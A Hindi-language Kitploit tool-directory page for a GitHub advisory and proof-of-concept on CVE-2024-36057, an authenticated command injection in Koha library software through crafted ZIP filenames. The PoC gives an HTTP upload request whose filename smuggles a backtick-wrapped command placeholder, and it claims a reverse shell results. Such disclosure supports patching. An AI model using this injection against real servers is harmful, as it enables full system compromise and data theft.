Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36057 — CVE-2024-36057 के लिए सलाह और प्रूफ-ऑफ-कॉन्सेप्ट, जो Koha लाइब्रेरी सॉफ्टवेयर में एक प्रमाणित OS कमांड इंजेक्शन है, जो तैयार किए गए ZIP फ़ाइलनामों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/hacklantic/cve-2024-36057
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubhacklantic/cve-2024-36057

CVE-2024-36057

CVE-2024-36057 के लिए सलाह और प्रूफ-ऑफ-कॉन्सेप्ट, जो Koha लाइब्रेरी सॉफ्टवेयर में एक प्रमाणित OS कमांड इंजेक्शन है, जो तैयार किए गए ZIP फ़ाइलनामों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है।

रिपॉजिटरी देखें
520 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-36057 — Koha लाइब्रेरी सॉफ्टवेयर < 22.05.22 — OS कमांड इंजेक्शन

CVE ID: CVE-2024-36057
उत्पाद: Koha लाइब्रेरी सॉफ्टवेयर
भेद्यता प्रकार: OS कमांड इंजेक्शन (CWE-78)
CVSS स्कोर: 8.7 (उच्च) प्रमाणित
प्रभावित संस्करण: 22.05.22 से नीचे
क्रेडिट: Karolis Narvilas


विवरण

Koha एक ओपन-सोर्स एकीकृत लाइब्रेरी प्रणाली है। tools/upload-cover-image.pl पर कवर इमेज अपलोड कार्यक्षमता में एक कमांड इंजेक्शन भेद्यता मौजूद है। एप्लिकेशन फ़ाइलनाम पैरामीटर को सैनिटाइज़ किए बिना अपलोड किए गए ZIP संग्रह को निकालने के लिए qx/unzip $filename -d $dirname/ का उपयोग करता है।

एक प्रमाणित उच्च-विशेषाधिकार वाला उपयोगकर्ता बैकटिक वर्णों वाले दुर्भावनापूर्ण फ़ाइलनाम के साथ एक ZIP फ़ाइल तैयार कर सकता है ताकि मनमाने शेल कमांड इंजेक्ट किए जा सकें, जो उपयोगकर्ता द्वारा "Process Images" पर क्लिक करने पर सर्वर-साइड पर निष्पादित होते हैं।

प्रभाव: एक दूरस्थ प्रमाणित हमलावर अंतर्निहित सर्वर पर मनमाने OS कमांड निष्पादित करने के लिए CVE-2024-36057 का शोषण कर सकता है, जिससे पूर्ण सिस्टम समझौता, डेटा बहिर्गमन, और स्थायी बैकडोर या रिवर्स शेल की स्थापना हो सकती है।


प्रूफ-ऑफ-कॉन्सेप्ट (PoC)

  • उच्च-विशेषाधिकार वाले उपयोगकर्ता के रूप में Koha में लॉग इन करें।
  • यहाँ नेविगेट करें: https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl
  • एक सामान्य ZIP फ़ाइल अपलोड करें और, Burp Suite जैसे इंटरसेप्टिंग प्रॉक्सी का उपयोग करके, फ़ाइलनाम को नीचे दिखाए अनुसार संपादित करें:

  • अनुरोध:

    root@kitploit:~
    POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
    Host: {domain}
    Cookie: [High-Privilege Session]
    Connection: close
    
    ------WebKitFormBoundaryP82Da5V6eaQOuBUT
    Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
    Content-Type: application/x-zip-compressed
    
    <zip file contents>
    ------WebKitFormBoundaryP82Da5V6eaQOuBUT--
    

    1. ZIP फ़ाइल सफलतापूर्वक अपलोड होने के बाद, "Process Images" पर क्लिक करें।
    2. बैकटिक्स के भीतर इंजेक्ट किया गया कमांड सर्वर-साइड पर निष्पादित होता है। इस उदाहरण में, लक्ष्य मशीन पर एक रिवर्स शेल स्थापित किया जाता है।

    Reverse Shell PoC


    संदर्भ

    • Koha समुदाय - v22.05.22 के लिए रिलीज़ नोट्स
    • MITRE - CVE-2024-36057
    • Hacklantic
    टूल डाउनलोड करें